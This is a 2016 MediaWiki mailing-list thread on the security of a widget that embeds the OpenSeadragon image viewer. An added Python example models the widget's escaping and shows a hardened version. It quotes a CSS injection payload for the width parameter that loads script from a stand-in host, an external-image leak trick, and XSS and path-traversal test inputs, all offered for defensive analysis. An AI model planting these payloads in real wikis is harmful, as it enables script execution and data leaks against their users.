[MediaWiki-l] Security of widgets? Way to limit parameters? OpenSeadragon

Brian Wolff bawolff at gmail.com
Sun Oct 30 00:30:23 UTC 2016


On Saturday, October 29, 2016, Daniel Friesen <daniel at nadir-seen-fire.com>
wrote:
> On 2016-10-29 8:40 AM, Brian Wolff wrote:
>> On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert
>> <michael at librepathology.org> wrote:
>>> Hello,
>>>
>>> I was wondering about the security of Widgets  (
>>> https://www.mediawiki.org/wiki/Extension:Widgets )  that get parameters
>>> passed to them. Any thoughts?
>>>
>>> Are the parameters passed through to the widget cleansed of html/scripts?
>>> If it isn't -- is it possible to easily enforce typing/boundaries on the
>>> parameters?
> There is no way to abstractly ensure scripts are cleaned from text. If
> you know exactly where it is going you may be able to escape everything.
> But you cannot target scripting explicitly and expect to clean it up, as
> there are numerous tricks that can be used to bypass anything but the
> strictest of escaping:
> https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
>
>>> Create page: Widget:OpenSeadragon
>>> ---------------------------------------------------------------------
>>> <noinclude>__NOTOC__
>>> <!-- Copyright (c) 2016 Michael Bonert -->
>>> <!-- Released under GNU General Public Licence - Version 3; see
>>> http://www.gnu.org/licenses/gpl.html -->
>>> To insert this widget, use the following code:
>>>
>>> <nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki>
>>> |image=12881.dzi
>>> |width=800
>>> |height=600
>>> }}</nowiki>
>>>
>>>
>>> </noinclude>
>>> <includeonly><!-- This inserts an OpenSeadragon image -->
>>> <div id="openseadragon1" style="width:
>>> <!--{$width|default:400|escape:'html'}-->px; height:
>>> <!--{$height|default:300|escape:'html'}-->px;"></div>
>>> <script src="../../openseadragon/openseadragon.min.js"></script>
>>> <script type="text/javascript">
>>>     var viewer = OpenSeadragon({
>>>         id: "openseadragon1",
>>>         prefixUrl: "../../openseadragon/images/",
>>>         tileSources: "../../vslide/<!--{$image|escape:'urlpathinfo'}-->"
>>>     });
>>> </script>
>>> </includeonly>
>>> -------------------------------------------------
>>>
>> In theory that's what the escape modifier is for in smarty parameters.
>>
>> However, in this example, <!--{$width|default:400|escape:'html'}-->px;
>> inside a style attribute isn't really sufficient, as a user could set
>> a width parameter like "400; behavior: url(
>> 'https://foo.com/bar.htc#baz' );x: ", which would cause javascript
>> execution on IE9 and older. (There are other properties for other
>> browsers, however mostly affecting only older browsers). You could
>> also leak private info about your users by doing something like
>> background-image: url( "http://external.com/foo.png" ) .
>>
>> [Disclaimer: I have not read the source code of the widgets extension,
>> so there could also potentially be generic security issues with the
>> extension. Since I haven't reviewed it, I don't really know].
>>
>> --
>> bawolff
> And then there is $image. urlpathinfo doesn't escape quotes,
> backslashes, or </script>.
>
>

It's hard to find docs on what urlpathinfo actually does (talk about a red
flag for a security mechanism...) but I thought it was basically
rawurlencode, which I think escapes all the relevant characters in this
context as percent encoding.

--
Bawolff
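The two escaping questions raised in this thread can be checked offline. The following is an added example written for this page, not code from the thread, from the Widgets extension, or from Smarty. It models the posted widget's escaping in Python: `escape:'html'` is assumed to behave like PHP `htmlspecialchars()` with ENT_QUOTES, and `escape:'urlpathinfo'` is assumed to be `rawurlencode()` with `/` restored afterwards (that is how the Smarty 3 source I know of implements it; confirm against the version you run). The `render_widget_*`, `safe_*`, `style_properties` and `tile_source` helpers and all sample inputs are constructed for the illustration. It shows Brian's width payload surviving HTML escaping into extra CSS declarations once the browser decodes the attribute, the hardened variant falling back to the default by validating type and bounds instead, and what percent-encoding of `$image` does and does not constrain.

```python
"""Added example: models the escaping in the posted OpenSeadragon widget.

Assumptions (not verified against the deployed Smarty/Widgets versions):
  - escape:'html'        ~ PHP htmlspecialchars($s, ENT_QUOTES)
  - escape:'urlpathinfo' ~ PHP rawurlencode($s) with '%2F' turned back into '/'
"""
import html
import re
from typing import List
from urllib.parse import quote


def smarty_escape_html(value: str) -> str:
    """Approximates Smarty escape:'html' (htmlspecialchars with ENT_QUOTES)."""
    return html.escape(value, quote=True)


def smarty_escape_urlpathinfo(value: str) -> str:
    """Assumed model of escape:'urlpathinfo': rawurlencode, then '/' restored."""
    return quote(value, safe="").replace("%2F", "/")


def render_widget_as_posted(width: str, height: str, image: str) -> str:
    """Same escaping as the widget in the thread: html into style="", urlpathinfo into a JS string."""
    return (
        f'<div id="openseadragon1" style="width: {smarty_escape_html(width)}px; '
        f'height: {smarty_escape_html(height)}px;"></div>\n'
        f'<script>var viewer = OpenSeadragon({{id: "openseadragon1", '
        f'tileSources: "../../vslide/{smarty_escape_urlpathinfo(image)}"}});</script>'
    )


# Hardened variant (hypothetical): validate type and bounds, do not escape free text.
_DIMENSION = re.compile(r"[1-9][0-9]{0,3}")            # integer pixels, 1..9999
_IMAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.dzi")  # bare .dzi file name, no path


def safe_dimension(value: str, default: int) -> int:
    """An int in 1..9999, or the default when the parameter is anything else."""
    return int(value) if _DIMENSION.fullmatch(value) else default


def image_accepted(value: str) -> bool:
    """True only for a plain file name: no '../', quotes, slashes or %-escapes."""
    return _IMAGE_NAME.fullmatch(value) is not None


def render_widget_hardened(width: str, height: str, image: str) -> str:
    if not image_accepted(image):
        raise ValueError(f"rejected image parameter: {image!r}")
    w, h = safe_dimension(width, 400), safe_dimension(height, 300)
    img = quote(image, safe="")  # already whitelisted; encoding is belt and braces
    return (
        f'<div id="openseadragon1" style="width: {w}px; height: {h}px;"></div>\n'
        f'<script>var viewer = OpenSeadragon({{id: "openseadragon1", '
        f'tileSources: "../../vslide/{img}"}});</script>'
    )


def style_properties(rendered: str) -> List[str]:
    """CSS property names the browser ends up with: take the style attribute,
    decode entities (as the HTML parser does before CSS parsing), split on ';'."""
    css = html.unescape(re.search(r'style="([^"]*)"', rendered).group(1))
    return [d.split(":", 1)[0].strip() for d in css.split(";") if d.strip()]


def tile_source(rendered: str) -> str:
    """The tileSources string literal as emitted inside the <script>."""
    return re.search(r'tileSources: "([^"]*)"', rendered).group(1)


if __name__ == "__main__":
    # Constructed inputs: the width payload from the thread plus two hostile image names.
    css_payload = "400; behavior: url( 'https://foo.com/bar.htc#baz' );x: "
    print(style_properties(render_widget_as_posted(css_payload, "600", "12881.dzi")))
    print(style_properties(render_widget_hardened(css_payload, "600", "12881.dzi")))
    print(tile_source(render_widget_as_posted("800", "600", '"; alert(1); //')))
    print(tile_source(render_widget_as_posted("800", "600", "../../other/secret.dzi")))
```

Under these assumptions the quote-breaking image name is neutralised (`"`, `;`, `(` all become percent escapes), so the JS string literal stays closed, but `../` passes through untouched because `.` is unreserved and `/` is restored, so the parameter still picks an arbitrary path under the tile server. The width check is the more general lesson: anything that lands in a `style` attribute, a URL, or a script needs a type-and-range whitelist for that context, not a generic escape.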
